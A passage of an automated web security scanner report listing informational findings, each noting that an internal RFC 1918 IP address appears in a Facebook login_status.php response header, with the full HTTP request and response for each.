GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a9c6a8e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3f366f4d8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff0a8ae08%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3f366f4d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb16b277%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17e32d474%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3f366f4d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb16b277&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25c78d14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3f366f4d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb16b277&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df294fdca9%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3f366f4d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb16b277&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.23.31
X-Cnection: close
Date: Thu, 16 Jun 2011 12:35:49 GMT
Content-Length: 22

Invalid Application ID

19.701. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.177.53

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c1c9dac4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1aa8c6f18%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d01ec29c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1aa8c6f18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df313525138%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdc6f6d3%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1aa8c6f18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df313525138&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe46d5494%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1aa8c6f18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df313525138&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2eca70ca8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1aa8c6f18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df313525138&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.177.53
X-Cnection: close
Date: Thu, 16 Jun 2011 14:44:59 GMT
Content-Length: 22

Invalid Application ID

19.702. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.157.42

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df201aa5928%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffac3ba548%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7a386fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffac3ba548%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33a54a3f%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28d9ab228%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffac3ba548%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33a54a3f&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3657ac6dc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffac3ba548%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33a54a3f&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18ee91dc8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffac3ba548%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33a54a3f&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.157.42
X-Cnection: close
Date: Thu, 16 Jun 2011 17:09:46 GMT
Content-Length: 22

Invalid Application ID

19.703. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.103.57

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ded12fa8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa9a1e43%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19fb8d26%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa9a1e43%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ab45ddec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1de96116c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa9a1e43%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ab45ddec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7bba132c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa9a1e43%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ab45ddec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34c730b48%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa9a1e43%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1ab45ddec&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.103.57
X-Cnection: close
Date: Thu, 16 Jun 2011 15:21:08 GMT
Content-Length: 22

Invalid Application ID

19.704. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.172.40

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7d7f9764%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f13fbd2c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27c688974%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f13fbd2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df320d629ac%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15fd9890c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f13fbd2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df320d629ac&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3935bdbec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f13fbd2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df320d629ac&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b591360%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f13fbd2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df320d629ac&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.172.40
X-Cnection: close
Date: Thu, 16 Jun 2011 12:46:08 GMT
Content-Length: 22

Invalid Application ID

19.705. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.111.83

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df62359904%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff7024fb3%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df313c282c8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff7024fb3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b6ae58f4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ebcfa67c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff7024fb3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b6ae58f4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df38ef32088%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff7024fb3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b6ae58f4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df246461014%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff7024fb3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b6ae58f4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.111.83
X-Cnection: close
Date: Thu, 16 Jun 2011 12:09:53 GMT
Content-Length: 22

Invalid Application ID

19.706. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.235.38

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff3af5fdc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2faddcf58%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13e59ab58%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2faddcf58%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df138990ec4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df364af7574%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2faddcf58%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df138990ec4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bae2f87%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2faddcf58%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df138990ec4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18fe4295%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2faddcf58%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df138990ec4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.235.38
X-Cnection: close
Date: Thu, 16 Jun 2011 15:10:49 GMT
Content-Length: 22

Invalid Application ID

19.707. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.150.30

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df24939b95c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f3e598%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df218e09b4c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f3e598%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd54bd3a8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3fc33e0cc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f3e598%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd54bd3a8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e7fdd27%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f3e598%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd54bd3a8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25dae14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f3e598%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd54bd3a8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.150.30
X-Cnection: close
Date: Thu, 16 Jun 2011 17:40:44 GMT
Content-Length: 22

Invalid Application ID

19.708. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.204.61

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df172232794%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff34167b284%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb939440c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff34167b284%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33835cdc4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df123715b2c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff34167b284%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33835cdc4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df59e1406c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff34167b284%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33835cdc4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3814bbdb8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff34167b284%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33835cdc4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.204.61
X-Cnection: close
Date: Thu, 16 Jun 2011 14:03:39 GMT
Content-Length: 22

Invalid Application ID

19.709. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.247.106

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26badafe%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3fbe1cebc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df273f840%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3fbe1cebc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df58418798%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27190099c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3fbe1cebc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df58418798&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c5da554c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3fbe1cebc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df58418798&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1067a6878%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3fbe1cebc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df58418798&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.247.106
Connection: close
Date: Thu, 16 Jun 2011 17:56:15 GMT
Content-Length: 22

Invalid Application ID

19.710. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.50.119

Request

